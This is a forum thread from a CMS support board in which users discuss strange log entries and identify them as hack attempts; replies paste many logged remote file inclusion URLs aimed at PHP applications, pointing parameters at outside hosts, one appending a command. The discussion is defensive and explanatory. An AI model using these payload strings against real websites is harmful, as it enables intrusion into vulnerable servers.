Go to main content

Textpattern CMS support forum

You are not logged in. Register | Login | Help

#1 2007-05-06 15:10:17

masa
Member
From: North Wales, UK
Registered: 2005-11-25
Posts: 1,095

Funny URLs appearing in log

Hi there,

lately I’ve noticed an increasing number of strange URLs appearing in the log’s Page column, for instance:

index.php?file=http://www.vesa.lv/file.txt?
index.php?file=http://perdu.ch/cgi-bin/echo?
index.php?file=http://www.eusians.com/images/about.jpg?

Following the http: part usually brings up an empty page or an error message.

Does anyone have an idea what’s going on here? Is it something to be concerned about?

Cheers Martin

Offline

#2 2007-05-06 16:58:47

hcgtv
Archived Plugin Author
From: Key Largo, Florida
Registered: 2005-11-29
Posts: 2,722
Website

Re: Funny URLs appearing in log

I’ve been seeing the same thing also, they are hack attempts.

My PHPXref site, which has source code for so many projects, is a magnet for script kiddies.

/show_archives.php?template=ht​tp://www.pikspiller.dk/stats/f​ormat/status.txt?​
index.php?temp=http://www.vesa​.lv/file.txt?​
/docebocms/lib/lib.simplesel.p​hp?GLOBALS[where_framework]=ht​tp://www.tritonzao.by.ru/cmd.t​xt?&cmd=id​
/include/main.php?config[searc​h_disp]=true&include_dir=h​ttp://perdu.ch/cgi-bin/echo?​
/modules/xoopsgallery/upgrade_ ​album.php?GALLERY_BASEDIR=http​://www.abschleppdienst-viersen​ .de/templates/mp_ferro/images/​freeman.txt?​
/phorum/plugin/replace/plugin.​php?PHORUM[settings_dir]=http:​//www.treibball.de/images/abou​t.jpg??​
/components/com_smf/smf.php?mo​sConfig_absolute_path=http://w​ww.keithiansmith.com/mike/mike​.txt?​

So far, Textpattern is holding up just fine.

Offline

#3 2007-05-06 23:13:53

zem
Developer Emeritus
From: Melbourne, Australia
Registered: 2004-04-08
Posts: 2,579

Re: Funny URLs appearing in log

FAQ

“Attempted security breaches are a daily occurrence at popular web sites. Vandals regularly scan thousands of web sites at a time for known security holes in common software. Only a small fraction of those sites will be vulnerable. On sites that aren’t, the only side effect will usually be a puzzling entry in the traffic log.”


Alex

Offline

Board footer

Powered by FluxBB